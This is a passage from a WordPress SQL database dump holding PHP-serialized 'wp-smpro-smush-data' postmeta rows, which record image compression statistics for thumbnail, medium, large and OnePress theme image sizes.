ersion\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.0600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:517;s:11:\"size_before\";i:3677;s:10:\"size_after\";i:3160;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1084;s:11:\"size_before\";i:6095;s:10:\"size_after\";i:5011;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.10000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4544;s:11:\"size_before\";i:18101;s:10:\"size_after\";i:13557;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7877;s:11:\"size_before\";i:27260;s:10:\"size_after\";i:19383;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:968;s:11:\"size_before\";i:5714;s:10:\"size_after\";i:4746;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:2031;s:11:\"size_before\";i:10300;s:10:\"size_after\";i:8269;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:3223;s:11:\"size_before\";i:14722;s:10:\"size_after\";i:11499;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4408,1693,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.40310550143340861950491671450436115264892578125;s:5:\"bytes\";i:19583;s:11:\"size_before\";i:77089;s:10:\"size_after\";i:57506;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:522;s:11:\"size_before\";i:3295;s:10:\"size_after\";i:2773;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:928;s:11:\"size_before\";i:5434;s:10:\"size_after\";i:4506;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:4480;s:11:\"size_before\";i:16325;s:10:\"size_after\";i:11845;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:7686;s:11:\"size_before\";i:24806;s:10:\"size_after\";i:17120;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:906;s:11:\"size_before\";i:5019;s:10:\"size_after\";i:4113;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1908;s:11:\"size_before\";i:8856;s:10:\"size_after\";i:6948;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:3153;s:11:\"size_before\";i:13354;s:10:\"size_after\";i:10201;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4409,1691,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.046958589260949423760393983684480190277099609375;s:5:\"bytes\";i:19226;s:11:\"size_before\";i:100940;s:10:\"size_after\";i:81714;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:429;s:11:\"size_before\";i:3795;s:10:\"size_after\";i:3366;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:916;s:11:\"size_before\";i:6558;s:10:\"size_after\";i:5642;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:4406;s:11:\"size_before\";i:21944;s:10:\"size_after\";i:17538;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7533;s:11:\"size_before\";i:32618;s:10:\"size_after\";i:25085;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:810;s:11:\"size_before\";i:6573;s:10:\"size_after\";i:5763;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1999;s:11:\"size_before\";i:12014;s:10:\"size_after\";i:10015;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:3133;s:11:\"size_before\";i:17438;s:10:\"size_after\";i:14305;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4410,1688,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:29.80047637692508288864701171405613422393798828125;s:5:\"bytes\";i:36533;s:11:\"size_before\";i:122592;s:10:\"size_after\";i:86059;s:4:\"time\";d:0.60999999999999998667732370449812151491641998291015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:3825;s:11:\"size_before\";i:11214;s:10:\"size_after\";i:7389;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:6088;s:11:\"size_before\";i:17084;s:10:\"size_after\";i:10996;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.659999999999996589394868351519107818603515625;s:5:\"bytes\";i:5652;s:11:\"size_before\";i:16305;s:10:\"size_after\";i:10653;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:8303;s:11:\"size_before\";i:29931;s:10:\"size_after\";i:21628;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.35000000000000142108547152020037174224853515625;s:5:\"bytes\";i:12665;s:11:\"size_before\";i:48058;s:10:\"size_after\";i:35393;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}}}'),(4411,1685,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.238407311341848782149099861271679401397705078125;s:5:\"bytes\";i:21201;s:11:\"size_before\";i:122987;s:10:\"size_after\";i:101786;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:537;s:11:\"size_before\";i:4094;s:10:\"size_after\";i:3557;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1032;s:11:\"size_before\";i:7996;s:10:\"size_after\";i:6964;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:4764;s:11:\"size_before\";i:26306;s:10:\"size_after\";i:21542;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:8201;s:11:\"size_before\";i:40583;s:10:\"size_after\";i:32382;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:956;s:11:\"size_before\";i:7653;s:10:\"size_after\";i:6697;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:2207;s:11:\"size_before\";i:14772;s:10:\"size_after\";i:12565;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3504;s:11:\"size_before\";i:21583;s:10:\"size_after\";i:18079;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4412,1684,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.046958589260949423760393983684480190277099609375;s:5:\"bytes\";i:19226;s:11:\"size_before\";i:100940;s:10:\"size_after\";i:81714;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:429;s:11:\"size_before\";i:3795;s:10:\"size_after\";i:3366;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:916;s:11:\"size_before\";i:6558;s:10:\"size_after\";i:5642;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:4406;s:11:\"size_before\";i:21944;s:10:\"size_after\";i:17538;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7533;s:11:\"size_before\";i:32618;s:10:\"size_after\";i:25085;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:810;s:11:\"size_before\";i:6573;s:10:\"size_after\";i:5763;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:1999;s:11:\"size_before\";i:12014;s:10:\"size_after\";i:10015;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:3133;s:11:\"size_before\";i:17438;s:10:\"size_after\";i:14305;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4413,1683,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:22.128933507405573521964470273815095424652099609375;s:5:\"bytes\";i:19662;s:11:\"size_before\";i:88852;s:10:\"size_after\";i:69190;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:446;s:11:\"size_before\";i:3652;s:10:\"size_after\";i:3206;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:824;s:11:\"size_before\";i:5732;s:10:\"size_after\";i:4908;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:4652;s:11:\"size_before\";i:19250;s:10:\"size_after\";i:14598;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.989999999999998436805981327779591083526611328125;s:5:\"bytes\";i:7853;s:11:\"size_before\";i:29095;s:10:\"size_after\";i:21242;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:707;s:11:\"size_before\";i:5395;s:10:\"size_after\";i:4688;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:2011;s:11:\"size_before\";i:10477;s:10:\"size_after\";i:8466;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:3169;s:11:\"size_before\";i:15251;s:10:\"size_after\";i:12082;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4414,1682,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.880030459886452121054389863274991512298583984375;s:5:\"bytes\";i:22699;s:11:\"size_before\";i:103743;s:10:\"size_after\";i:81044;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:641;s:11:\"size_before\";i:4392;s:10:\"size_after\";i:3751;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.5;s:5:\"bytes\";i:1076;s:11:\"size_before\";i:7419;s:10:\"size_after\";i:6343;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.469999999999998863131622783839702606201171875;s:5:\"bytes\";i:5249;s:11:\"size_before\";i:22360;s:10:\"size_after\";i:17111;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:9199;s:11:\"size_before\";i:33353;s:10:\"size_after\";i:24154;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:806;s:11:\"size_before\";i:6513;s:10:\"size_after\";i:5707;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.3299999999999982946974341757595539093017578125;s:5:\"bytes\";i:2167;s:11:\"size_before\";i:11823;s:10:\"size_after\";i:9656;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3561;s:11:\"size_before\";i:17883;s:10:\"size_after\";i:14322;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4415,1681,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.706295231074332008347482769750058650970458984375;s:5:\"bytes\";i:16090;s:11:\"size_before\";i:96311;s:10:\"size_after\";i:80221;s:4:\"time\";d:1.3400000000000000799360577730112709105014801025390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:402;s:11:\"size_before\";i:4711;s:10:\"size_after\";i:4309;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:756;s:11:\"size_before\";i:6975;s:10:\"size_after\";i:6219;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.629999999999999005240169935859739780426025390625;s:5:\"bytes\";i:3577;s:11:\"size_before\";i:20292;s:10:\"size_after\";i:16715;s:4:\"time\";d:1.2600000000000000088817841970012523233890533447265625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.129999999999999005240169935859739780426025390625;s:5:\"bytes\";i:6675;s:11:\"size_before\";i:30163;s:10:\"size_after\";i:23488;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:640;s:11:\"size_before\";i:6537;s:10:\"size_after\";i:5897;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1562;s:11:\"size_before\";i:11465;s:10:\"size_after\";i:9903;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2478;s:11:\"size_before\";i:16168;s:10:\"size_after\";i:13690;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4416,1680,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.172086679491485483595170080661773681640625;s:5:\"bytes\";i:18836;s:11:\"size_before\";i:98247;s:10:\"size_after\";i:79411;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:381;s:11:\"size_before\";i:3208;s:10:\"size_after\";i:2827;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:823;s:11:\"size_before\";i:6379;s:10:\"size_after\";i:5556;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:4400;s:11:\"size_before\";i:21575;s:10:\"size_after\";i:17175;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:7466;s:11:\"size_before\";i:32617;s:10:\"size_after\";i:25151;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:790;s:11:\"size_before\";i:5904;s:10:\"size_after\";i:5114;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:1884;s:11:\"size_before\";i:11457;s:10:\"size_after\";i:9573;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3092;s:11:\"size_before\";i:17107;s:10:\"size_after\";i:14015;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4417,1679,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.899660373073469799010126735083758831024169921875;s:5:\"bytes\";i:19277;s:11:\"size_before\";i:96871;s:10:\"size_after\";i:77594;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:434;s:11:\"size_before\";i:3420;s:10:\"size_after\";i:2986;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:912;s:11:\"size_before\";i:6296;s:10:\"size_after\";i:5384;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.10000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4393;s:11:\"size_before\";i:20818;s:10:\"size_after\";i:16425;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.030000000000001136868377216160297393798828125;s:5:\"bytes\";i:7558;s:11:\"size_before\";i:31456;s:10:\"size_after\";i:23898;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:848;s:11:\"size_before\";i:6176;s:10:\"size_after\";i:5328;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.870000000000000994759830064140260219573974609375;s:5:\"bytes\";i:1912;s:11:\"size_before\";i:11333;s:10:\"size_after\";i:9421;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:3220;s:11:\"size_before\";i:17372;s:10:\"size_after\";i:14152;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4418,1678,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.02016418106364170625965925864875316619873046875;s:5:\"bytes\";i:18837;s:11:\"size_before\";i:99037;s:10:\"size_after\";i:80200;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:395;s:11:\"size_before\";i:3409;s:10:\"size_after\";i:3014;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:809;s:11:\"size_before\";i:6071;s:10:\"size_after\";i:5262;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:4308;s:11:\"size_before\";i:21764;s:10:\"size_after\";i:17456;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:7461;s:11:\"size_before\";i:32843;s:10:\"size_after\";i:25382;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:736;s:11:\"size_before\";i:5846;s:10:\"size_after\";i:5110;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:1984;s:11:\"size_before\";i:11855;s:10:\"size_after\";i:9871;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3144;s:11:\"size_before\";i:17249;s:10:\"size_after\";i:14105;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4419,1677,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.876353917569275608911993913352489471435546875;s:5:\"bytes\";i:21950;s:11:\"size_before\";i:71090;s:10:\"size_after\";i:49140;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:438;s:11:\"size_before\";i:2742;s:10:\"size_after\";i:2304;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1004;s:11:\"size_before\";i:4963;s:10:\"size_after\";i:3959;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.89999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4986;s:11:\"size_before\";i:15156;s:10:\"size_after\";i:10170;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:8836;s:11:\"size_before\";i:23164;s:10:\"size_after\";i:14328;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:882;s:11:\"size_before\";i:4680;s:10:\"size_after\";